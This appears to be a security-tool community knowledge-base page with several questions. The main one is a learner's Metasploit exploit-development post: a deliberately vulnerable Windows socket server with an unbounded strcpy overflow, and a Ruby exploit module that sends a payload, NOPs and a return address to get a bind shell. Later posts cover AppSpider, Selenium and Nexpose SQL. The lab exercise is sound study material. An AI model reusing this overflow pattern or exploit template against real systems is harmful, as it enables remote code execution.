Knowledge Base

Ask A Question



Metasploit: Problems with Meterpreter payload [pschoenb]

I am in the process of learning the art of penetration testing and also how to work with Metasploit, including the development of new exploits. As a first test for exploit development, I wrote a little Windows server: ```c /* server.cpp */ #include "stdafx.h" #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <errno.h> #include <time.h> /* Headerfiles für Windows */ #include <winsock.h> #include <io.h> /* Portnummer */ #define PORT 1234 /* Puffer für eingehende Nachrichten */ #define RCVBUFSIZE 8192 #define INBUFSIZE 2000 static void echo(SOCKET); static void error_exit(char *errorMessage); static void outputString(char* buffer, time_t zeit); /* AUsgabe der Client Informationen */ static void echo(SOCKET client_socket) { char echo_buffer[RCVBUFSIZE]; int recv_size; time_t zeit; if((recv_size = recv(client_socket, echo_buffer, RCVBUFSIZE - 1,0)) < 0) error_exit("Fehler bei recv()"); // echo_buffer[recv_size] = '\0'; time(&zeit); outputString(echo_buffer, zeit); } static void outputString(char* buffer, time_t zeit) { char in_buffer[INBUFSIZE]; strcpy(in_buffer, buffer); printf("Nachrichten vom Client : %s \t%s", in_buffer, ctime(&zeit)); } /* Fehlerausgabe*/ static void error_exit(char *error_message) { fprintf(stderr,"%s: %d\n", error_message, WSAGetLastError()); exit(EXIT_FAILURE); } int main( int argc, char *argv[]) { struct sockaddr_in server, client; SOCKET sock, fd; int len; #ifdef _WIN32 WORD wVersionRequested; WSADATA wsaData; wVersionRequested = MAKEWORD (1, 1); if (WSAStartup (wVersionRequested, &wsaData) != 0) error_exit( "Fehler beim Initialisieren von Winsock"); else printf("Winsock initialisiert\n"); #endif /* Erzeuge das Socket. */ sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock < 0) error_exit("Fehler beim Anlegen eines Sockets"); /* Erzeuge die Socketadresse des Servers. */ memset( &server, 0, sizeof (server)); /* IPv4-Verbindung */ server.sin_family = AF_INET; /* INADDR_ANY: jede IP-Adresse annehmen */ server.sin_addr.s_addr = htonl(INADDR_ANY); /* Portnummer */ server.sin_port = htons(PORT); /* Bindung an einen bestimmten Port. */ if(bind(sock,(struct sockaddr*)&server, sizeof( server)) < 0) error_exit("Socket bind error\"binden\""); /* Verbindung akzeptieren */ if(listen(sock, 5) == -1 ) error_exit("Fehler bei listen"); /* Alles was ankommt ausgeben*/ while(1) { len = sizeof(client); fd = accept(sock, (struct sockaddr*)&client, &len); printf("Server ready\n"); if (fd < 0) error_exit("Fehler bei accept"); printf("Bearbeite den Client mit der Adresse: %s\n", inet_ntoa(client.sin_addr)); /* Bildschirmausgabe */ echo( fd ); /* Schließe die Verbindung. */ closesocket(fd); } return EXIT_SUCCESS; } ``` My corresponding exploit looks like this: ```ruby require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp #The names of the exploit module and the class are 'equal' def initialize(info = {}) super(update_info(info, 'Name' => 'Buffer Overflow in test server', 'Description' => %q{ This module exploits a buffer overflow found in a special test server used to explore exploit writing. }, #End of Description 'Author' => 'Patrick Schoenbach', #Change this value with your (nick)name 'License' => MSF_LICENSE, 'Version' => '$Revision: 1 $', 'DefaultOptions' => { 'EXITFUNC' => 'process' }, 'Payload' => { 'Space' => 2000, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Targets' => [ # Target 0 [ 'Windows 7', { 'Platform' => 'win', #We exploit a Windows target 'Ret' => 0x0018D4DC } ], ], 'DefaultTarget' => 0 ) #End of update_info() ) #End of super() register_options( [ Opt::RPORT(1234) ], self.class) end #End of initialize def exploit connect print_status("Trying target #{}...") nullSize = 4 request = payload.encoded request << make_nops(nullSize) # overwrite EBP request << [target.ret].pack('V') request << "\x00" * nullSize print_status("Total string length: #{request.length}") sock.puts(request) handler disconnect #We disconnect from the server end #End of exploit end #End of class ``` When using a simple payload like "windows/shell_bind_tcp", the exploit works as expected. However, when using the payload "windows/meterpreter/bind_tcp", I get an access violaton in the server, and I have no idea what actually goes wrong. Could someone enlighten me please what could be the problem? Sorry for posting so much code, but without the code, the problem would not be reproducable.

Posted by Edward Sheehy 2 years ago


AppSpider: Unable to Complete Scan due to Long Running Time [Amachi Lewis]

The Problem: So far, the scan takes several days to complete. During this time, if the PC is inactive for too long, it locks the PC. This will cause the session with the AppSpider server to end, thus closing AppSpider itself and subsequently ends the scan prematurely. Environment: We have an AppSpider Pro license. AppSpider is housed on a VM running Windows 2012 R2. I remote in to this server using my own login and run the scan. Actions tried: If I do this from my regular PC, my remote session ends after I lock my pc to leave my desk. If I do this from a special I have setup for this purpose, the same will happen when the PC locks due to inactivity. If I disable the lock screen, it seems to be a viable workaround, but the PC is easily interfered with and lock screen counter measures are not 100% reliable. Additionally, leaving myself logged into an unlocked PC, even if it is secured in a limited access room, is undesirable. We run the scan as a windows scheduled task; however, since we are Pro users and not Enterprise users, we don’t have any monitoring access besides opening AppSpider Application itself. This leaves with no choice but to sit and wait on an output to be created. However, whenever we decide to check on generated results, if nothing is there we won’t know if it the scan is failed, in a paused status, or still running. The only option we haven't tried it building a physical machine capable of housing and running AppSpider that can be logged into directly. So finally, my question to the AppSpider Pro community is: have any of you run into this kind of problem and if so how have you resolved it? If you have not had this difficulty, how does your configuration differ from mine? Any recommendations or suggestions would be greatly appreciated.

Posted by Stephanie Coyle 2 years ago


How to generate comprehensive Selenium variable name for complex HTML elements

I am trying to develop my own Selenium Page Object Generator. But I have encountered a problem where I have to generate meaningful names for web elements. I know I can do like this for "normal" elements: grab the html element, get the ID or Class and then use the extracted ID to make it into normal variable name. For example: <input type="text" name="username" size="10"> Here I can extract "name" attribute and generate variable name as userName. But let's say that there are more complex html elements now (link for example). For example: open google and type: selenium features and limitations. When I inspect the first link, it looks horrible and complex: <a href="/url?sa=t&amp;rct=j&amp;q=&amp;esrc=s&amp;source=web&amp;cd=1&amp;cad=rja&amp;uact=8&amp;ved=0ahUKEwiZi6z3i6PWAhWnKJoKHVUVBM8QFggkMAA&amp;;usg=AFQjCNEFZcVJn3i-IJijiF8WqyCh86K-_A" onmousedown="return rwt(this,'','','','1','AFQjCNEFZcVJn3i-IJijiF8WqyCh86K-_A','','0ahUKEwiZi6z3i6PWAhWnKJoKHVUVBM8QFggkMAA','','',event)" data-href="">What are the Advantages and Disadvantages of Selenium ? - Software ...</a> Exactly how am I supposed to generate comprehensive page object variable name from that? Is there some sort of algorithm?

Posted by soujanya 2 years ago


Nexpose: Nexpose Agent Review [Matthew Prouse]

So I recently installed the agent on a system and gave it a go. I know it is Beta...but I wanted to address the items I saw in case they aren't being addressed...Please add your own experience or feedback to help me and others get better acquainted... 1) I like the idea this is for mobile systems like laptops that can check in from outside... What I need is a way to use this agent on systems internally that are "off limits" to scanning for one reason or another and ensure the data is not traversing the "cloud" but proxying directly to the on prem console. I can already see this will not get approved by my Risk team without a full blown evaluation of how the data traverses. 2) The data is already internal credential scan and the external agent data is not even close to matching. From vulnerabilities, software installed, users, groups, etc. This will cause all kinds of confusion around remediation and compliance if we applied this to other systems. 3) I have multiple security consoles in my environment...I see it matters which Nexpose Now dashboard I pull the install package from to build its relationship with that agents cert. No big deal I just thought this would be configurable to point an agent at a particular Console/Nexpose Now dashboard. 4) Also just looking at my basic system build the agent is the 4th largest consumer of memory. As we add other applications and move this to production I will look to see if that impacts our final builds. I am sure I will have more but for now this is my initial feedback.

Posted by Edward Sheehy 2 years ago


Nexpose: SQL Query Export: Convenient Technique to Join Site Name to Assets [jaldridge]

One idiom that I've been having to use over and over again involves showing assets with their site names. But, this involves joining three tables, and I'd like to share a notational technique to make this more manageable. Note that I've been meaning to post a rant that the intermediate table, `dim_site_asset`, did not need to be a part of the design (as such tables are usually only justified when a many-to-many relationship, which this is not). However, as much time as I've been pondering the issue, I've found a notational convenience that alleviates some of my frustration. Having learned my early SQL skills on old systems and primitive embedded systems, I have been conditioned over the years to do everything the hard way, with lots of repeated/redundant SQL code, And since it's become apparent that modern SQL has cured much of that old coding malaise, I've been putting myself through a crash course to make the most of modern SQL features permitted through the NeXpose reporting interface. So, if you're new to SQL or if you're suffering from lots of ancient SQL habits, you might find this useful and time saving. The key to the trick is in how `SELECT *` works in a join. The following simply adds the column `site_id` to the table `dim_asset`: ```sql SELECT * FROM dim_asset JOIN dim_site_asset USING (asset_id) ``` This can then be used and re-used as defined sub-query in the 'WITH' block. Add to this a narrowed definition of the table dim_site, and you can use the same trick again to add in only the site name. ```sql WITH dim_asset_site AS ( SELECT * FROM dim_asset JOIN dim_site_asset USING (asset_id) ), dim_site_name AS ( SELECT site_id, name AS site_name FROM dim_site ) SELECT * FROM dim_asset_site JOIN dim_site_name USING (site_id) ``` To go ahead and make the whole thing reusable: ```sql WITH dim_asset_site AS ( SELECT * FROM dim_asset JOIN dim_site_asset USING (asset_id) ), dim_site_name AS ( SELECT site_id, name AS site_name FROM dim_site ), dim_asset_site_name AS ( SELECT * FROM dim_asset_site JOIN dim_site_name USING (site_id) ) SELECT * FROM dim_asset_site_name ``` For the number of times that I've joined site names to assets, this is certainly a technique I would like to have known about from the start, but I'm very happy to have learned that modern SQL has eliminated some of the nonsense that had existed way back in ancient history.


Posted by Edward Sheehy 2 years ago